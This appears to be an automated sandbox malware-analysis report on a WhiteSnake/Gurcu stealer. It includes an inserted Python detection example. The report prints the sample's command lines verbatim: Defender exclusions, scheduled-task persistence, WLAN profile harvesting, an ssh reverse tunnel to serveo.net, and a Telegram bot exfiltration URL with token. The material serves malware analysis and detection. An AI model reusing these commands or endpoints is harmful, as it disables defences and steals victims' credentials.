
Windows Analysis Report
jqOHOuPMJP.exe

Overview

General Information

Sample name: jqOHOuPMJP.exe (renamed because the original name is a hash value)
Original sample name: 7e9a93c69aecfc2bbda9470fbd4556db.exe
Analysis ID: 1390172
MD5: 7e9a93c69aecfc2bbda9470fbd4556db
SHA1: ab0e810472a897affac1a761b49595939f6897a9
SHA256: 82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
Tags: exe, WhiteSnakeStealer

Detection

Gurcu Stealer, WhiteSnake Stealer
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Gurcu Stealer
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
Adds a directory exclusion to Windows Defender
Disables UAC (registry)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Port Forwarding Activity Via SSH.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Process Tree

  • System is w10x64
  • jqOHOuPMJP.exe (PID: 6780 cmdline: C:\Users\user\Desktop\jqOHOuPMJP.exe MD5: 7E9A93C69AECFC2BBDA9470FBD4556DB)
    • powershell.exe (PID: 1516 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7216 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • vkefq4cv.oil.exe (PID: 7316 cmdline: "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
      • cmd.exe (PID: 7420 cmdline: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7468 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • timeout.exe (PID: 7484 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • schtasks.exe (PID: 7600 cmdline: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • vkefq4cv.oil.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
          • cmd.exe (PID: 7776 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ] MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7988 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • netsh.exe (PID: 8008 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
            • findstr.exe (PID: 8020 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • cmd.exe (PID: 8064 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8116 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • netsh.exe (PID: 8148 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
            • findstr.exe (PID: 8156 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • ssh.exe (PID: 4548 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
            • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • vkefq4cv.oil.exe (PID: 8072 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
    • cmd.exe (PID: 1196 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ] MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 2084 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 2004 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 6344 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 6544 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7384 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 7316 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 7500 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • ssh.exe (PID: 7440 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 1800 cmdline: C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • vkefq4cv.oil.exe (PID: 7712 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • vkefq4cv.oil.exe (PID: 125704 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • vkefq4cv.oil.exe (PID: 325468 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • vkefq4cv.oil.exe (PID: 491576 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • cleanup
{"C2 url": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349"}
Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

Source | Rule | Description | Author
0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GurcuStealer | Yara detected Gurcu Stealer | Joe Security
0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GurcuStealer | Yara detected Gurcu Stealer | Joe Security
00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GurcuStealer | Yara detected Gurcu Stealer | Joe Security
(10 entries in total; the remaining entries are not shown here)

Source | Rule | Description | Author
0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, CommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, ParentProcessId: 7316, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ProcessId: 7420, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentImage: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentProcessId: 6780, ParentProcessName: jqOHOuPMJP.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', ProcessId: 1516, ProcessName: powershell.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 185.119.118.59, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Initiated: true, ProcessId: 7620, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net, CommandLine: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net, CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ParentProcessId: 7620, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net, ProcessId: 4548, ProcessName: ssh.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f , CommandLine: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7420, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f , ProcessId: 7600, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentImage: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentProcessId: 6780, ParentProcessName: jqOHOuPMJP.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', ProcessId: 1516, ProcessName: powershell.exe

Stealing of Sensitive Information

Source: Process started | Author: Joe Security | Data: Command: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], CommandLine: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ParentProcessId: 7620, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], ProcessId: 7776, ProcessName: cmd.exe
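The Sigma hits above and the process tree earlier in the report describe one chain under a single parent: a Defender exclusion added through Add-MpPreference (including whole-tree exclusions for C:\Windows and the user profile), a scheduled task that reruns the dropped binary every minute from a folder under %LOCALAPPDATA%, WLAN profile enumeration via netsh, and a reverse SSH tunnel to serveo.net with host-key checking disabled. As an added example that is not part of the report, here is that chain expressed as process-creation detection logic with parent/child correlation, so that the four hits roll up to one root process instead of four unrelated tickets. The event records are constructed from the command lines and PIDs in the report plus one benign `schtasks /query` as a control; the record layout is a simplified stand-in for Sysmon event 1, and the rule names, the folder markers and the list of public tunnel hosts are this example's own.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcEvent:  # simplified Sysmon event 1 / Security 4688 record
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    root_pid: int  # top-most ancestor we hold an event for
    detail: str


# Constructed records: images, command lines and PIDs follow the report's process tree; the last one is a benign control.
EVENTS = [
    ProcEvent(6780, 1, r"C:\Users\user\Desktop\jqOHOuPMJP.exe", r"C:\Users\user\Desktop\jqOHOuPMJP.exe"),
    ProcEvent(1516, 6780, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", r'''powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'"'''),
    ProcEvent(7316, 6780, r"C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe", r'"C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"'),
    ProcEvent(7420, 7316, r"C:\Windows\System32\cmd.exe", r'cmd.exe /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" && START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"'),
    ProcEvent(7600, 7420, r"C:\Windows\System32\schtasks.exe", r'schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f'),
    ProcEvent(7620, 7420, r"C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe", r'"C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"'),
    ProcEvent(7776, 7620, r"C:\Windows\System32\cmd.exe", r'cmd.exe /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"'),
    ProcEvent(8008, 7776, r"C:\Windows\System32\netsh.exe", "netsh wlan show profiles"),
    ProcEvent(4548, 7620, r"C:\Windows\System32\OpenSSH\ssh.exe", r'"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net'),
    ProcEvent(9001, 9000, r"C:\Windows\System32\schtasks.exe", "schtasks /query /fo LIST"),
]

# Task locations that the "Suspicious Schtasks From Env Var Folder" idea flags (a subset, this example's own list).
USER_WRITABLE_DIRS = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\temp\\", "\\users\\public\\", "%appdata%", "%localappdata%", "%temp%")
TUNNEL_HOSTS = {"serveo.net", "localhost.run"}  # public reverse-tunnel services; extend for your environment
Hit = Optional[tuple[str, str]]  # (rule name, detail) or None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_defender_exclusion(ev: ProcEvent) -> Hit:
    excl = re.findall(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+'([^']+)'", ev.cmdline, re.I)
    if _basename(ev.image) != "powershell.exe" or not excl:
        return None
    # A path exclusion at drive, %SystemRoot% or profile depth switches Defender off for everything beneath it.
    broad = [v for kind, v in excl if kind.lower() == "path" and len(v.rstrip("\\").split("\\")) <= 3]
    return "defender_exclusion_via_mppreference", f"{len(excl)} exclusion(s); broad: {'; '.join(broad) or 'none'}"


def check_schtasks_persistence(ev: ProcEvent) -> Hit:
    if _basename(ev.image) != "schtasks.exe" or "/create" not in ev.cmdline.lower():
        return None
    m = re.search(r'/tr\s+(?:"([^"]*)"|(\S+))', ev.cmdline, re.I)
    action = (m.group(1) or m.group(2)) if m else ""
    in_user_dir = any(marker in action.lower() for marker in USER_WRITABLE_DIRS)
    every_minute = re.search(r"/sc\s+minute", ev.cmdline, re.I) is not None
    if not (in_user_dir or every_minute):
        return None
    return "schtasks_persistence_user_dir", f"action={action} user_dir={in_user_dir} every_minute={every_minute}"


def check_ssh_reverse_tunnel(ev: ProcEvent) -> Hit:
    fwd = re.search(r"(?:^|\s)-R\s+(\S+)", ev.cmdline)  # -R = remote port forward, i.e. an inbound path to this host
    if _basename(ev.image) != "ssh.exe" or not fwd:
        return None
    host = ev.cmdline.split()[-1].lower()  # assumption: the destination is the last argument
    note = " (public tunnel service)" if host in TUNNEL_HOSTS else ""
    if "stricthostkeychecking=no" in ev.cmdline.lower():
        note += " (host key checking disabled: built for unattended use)"
    return "ssh_reverse_tunnel", f"remote forward {fwd.group(1)} via {host}{note}"


def check_wlan_harvest(ev: ProcEvent) -> Hit:
    if _basename(ev.image) != "netsh.exe" or not re.search(r"wlan\s+show\s+profiles?", ev.cmdline, re.I):
        return None
    stage = "key=clear (plaintext PSK read)" if "key=clear" in ev.cmdline.lower() else "profile enumeration"
    return "wlan_profile_harvest", stage


CHECKS = (check_defender_exclusion, check_schtasks_persistence, check_ssh_reverse_tunnel, check_wlan_harvest)


def root_of(pid: int, by_pid: dict[int, ProcEvent]) -> int:
    """Follow ppid links while the parent is in our event set; `seen` guards against PID-reuse cycles."""
    seen: set[int] = set()
    while pid in by_pid and by_pid[pid].ppid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def detect(events: list[ProcEvent]) -> list[Alert]:
    by_pid = {e.pid: e for e in events}
    return [Alert(hit[0], ev.pid, root_of(ev.pid, by_pid), hit[1])
            for ev in events for check in CHECKS if (hit := check(ev))]


def summarize(events: list[ProcEvent]) -> dict[int, set[str]]:
    """Rules fired per root process: several rules under one root are one incident, not several tickets."""
    out: dict[int, set[str]] = {}
    for a in detect(events):
        out.setdefault(a.root_pid, set()).add(a.rule)
    return out
```

Run against the constructed events, `summarize` yields a single root (PID 6780, the submitted sample) with all four rules attached, and the control `schtasks /query` produces nothing. Two caveats a production version needs: the `-R` forward alone is common on admin workstations, so the tunnel rule gets its weight from the destination list and the disabled host-key check rather than from the flag; and `netsh wlan show profiles` without `key=clear` is only enumeration, so the WLAN rule should be scored on the parent (here a freshly dropped binary under AppData) rather than on the netsh invocation itself.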
                  No Snort rule has matched


AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: http://216.250.190.139:80 | Avira URL Cloud: Label: malware
Source: https://192.99.196.191:443 | Avira URL Cloud: Label: malware
Source: http://66.42.56.128:80 | Avira URL Cloud: Label: malware
Source: http://82.147.85.194/byte/@jokerbot880901.txt | Avira URL Cloud: Label: malware
Source: http://185.217.98.121:80 | Avira URL Cloud: Label: malware
Source: https://44.228.161.50:443 | Avira URL Cloud: Label: malware
Source: https://164.90.185.9:443 | Avira URL Cloud: Label: malware
Source: http://18.228.80.130:80 | Avira URL Cloud: Label: malware
Source: http://185.217.98.121:8080 | Avira URL Cloud: Label: malware
Source: http://pesterbdd.com/i? | Avira URL Cloud: Label: malware
Source: http://82.147.85.194/byte/ | Avira URL Cloud: Label: malware
Source: https://185.217.98.121:443 | Avira URL Cloud: Label: malware
Source: http://116.202.101.219:8080 | Avira URL Cloud: Label: malware
Source: http://206.189.109.146:80 | Avira URL Cloud: Label: malware
Source: vkefq4cv.oil.exe.8072.18.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"}
Source: vkefq4cv.oil.exe.8072.18.memstrmin | Malware Configuration Extractor: Gurcu Stealer {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349"}
Source: serveo.net | Virustotal: Detection: 7%
Source: http://216.250.190.139:80 | Virustotal: Detection: 7%
Source: http://193.142.58.127:80 | Virustotal: Detection: 6%
Source: http://66.42.56.128:80 | Virustotal: Detection: 8%
Source: http://185.217.98.121:80 | Virustotal: Detection: 15%
Source: https://164.90.185.9:443 | Virustotal: Detection: 8%
Source: http://18.228.80.130:80 | Virustotal: Detection: 10%
Source: http://185.217.98.121:8080 | Virustotal: Detection: 11%
Source: jqOHOuPMJP.exe | ReversingLabs: Detection: 13%
Source: jqOHOuPMJP.exe | Virustotal: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Joe Sandbox ML: detected
